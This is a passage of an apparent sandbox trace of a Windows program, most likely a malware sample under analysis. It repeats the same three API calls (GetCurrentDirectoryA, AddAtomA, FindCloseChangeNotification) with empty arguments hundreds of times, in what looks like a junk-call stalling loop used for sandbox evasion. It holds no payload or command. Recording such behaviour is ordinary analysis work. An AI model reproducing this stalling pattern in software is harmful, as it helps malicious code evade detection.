out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.160] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.160] AddAtomA (lpString=0x0) returned 0x0 [0114.160] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.161] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.161] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.161] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.161] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.161] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.161] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.161] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.161] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.161] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.161] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.162] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.162] AddAtomA (lpString=0x0) returned 0x0 [0114.162] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.163] AddAtomA (lpString=0x0) returned 0x0 [0114.163] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.163] AddAtomA (lpString=0x0) returned 0x0 [0114.163] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.163] AddAtomA (lpString=0x0) returned 0x0 [0114.163] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.163] AddAtomA (lpString=0x0) returned 0x0 [0114.163] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.163] AddAtomA (lpString=0x0) returned 0x0 [0114.163] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.163] AddAtomA (lpString=0x0) returned 0x0 [0114.163] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.163] AddAtomA (lpString=0x0) returned 0x0 [0114.163] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.163] AddAtomA (lpString=0x0) returned 0x0 [0114.163] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.163] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.164] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.164] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.164] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.164] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.164] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.164] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.164] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.164] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.164] AddAtomA (lpString=0x0) returned 0x0 [0114.164] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.165] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.165] AddAtomA (lpString=0x0) returned 0x0 [0114.165] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.165] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.165] AddAtomA (lpString=0x0) returned 0x0 [0114.165] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.165] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.165] AddAtomA (lpString=0x0) returned 0x0 [0114.165] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.165] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.165] AddAtomA (lpString=0x0) returned 0x0 [0114.165] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.165] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.165] AddAtomA (lpString=0x0) returned 0x0 [0114.165] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.165] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.165] AddAtomA (lpString=0x0) returned 0x0 [0114.165] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.165] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.165] AddAtomA (lpString=0x0) returned 0x0 [0114.165] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.165] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.165] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.166] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.166] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.166] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.166] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.166] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.166] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.166] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.166] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.166] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.166] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.166] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.166] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.166] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.166] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.166] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.166] AddAtomA (lpString=0x0) returned 0x0 [0114.166] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.167] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.167] AddAtomA (lpString=0x0) returned 0x0 [0114.167] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.167] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.167] AddAtomA (lpString=0x0) returned 0x0 [0114.167] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.167] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.167] AddAtomA (lpString=0x0) returned 0x0 [0114.167] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.167] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.167] AddAtomA (lpString=0x0) returned 0x0 [0114.167] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.167] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.167] AddAtomA (lpString=0x0) returned 0x0 [0114.167] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.167] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.167] AddAtomA (lpString=0x0) returned 0x0 [0114.167] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.167] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.167] AddAtomA (lpString=0x0) returned 0x0 [0114.167] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.167] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.167] AddAtomA (lpString=0x0) returned 0x0 [0114.167] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.212] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.212] AddAtomA (lpString=0x0) returned 0x0 [0114.212] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.212] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.212] AddAtomA (lpString=0x0) returned 0x0 [0114.212] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.212] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.212] AddAtomA (lpString=0x0) returned 0x0 [0114.212] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.212] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.212] AddAtomA (lpString=0x0) returned 0x0 [0114.212] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.212] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.212] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.213] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.213] AddAtomA (lpString=0x0) returned 0x0 [0114.213] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.214] AddAtomA (lpString=0x0) returned 0x0 [0114.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.214] AddAtomA (lpString=0x0) returned 0x0 [0114.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.214] AddAtomA (lpString=0x0) returned 0x0 [0114.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.214] AddAtomA (lpString=0x0) returned 0x0 [0114.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.214] AddAtomA (lpString=0x0) returned 0x0 [0114.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.214] AddAtomA (lpString=0x0) returned 0x0 [0114.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.214] AddAtomA (lpString=0x0) returned 0x0 [0114.214] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.214] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.214] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.215] AddAtomA (lpString=0x0) returned 0x0 [0114.215] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.215] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.216] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.216] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.216] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0114.217] AddAtomA (lpString=0x0) returned 0x0 [0114.217] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0114.217] GetCurrentDirectoryA (in: nBufferLength=0x0, 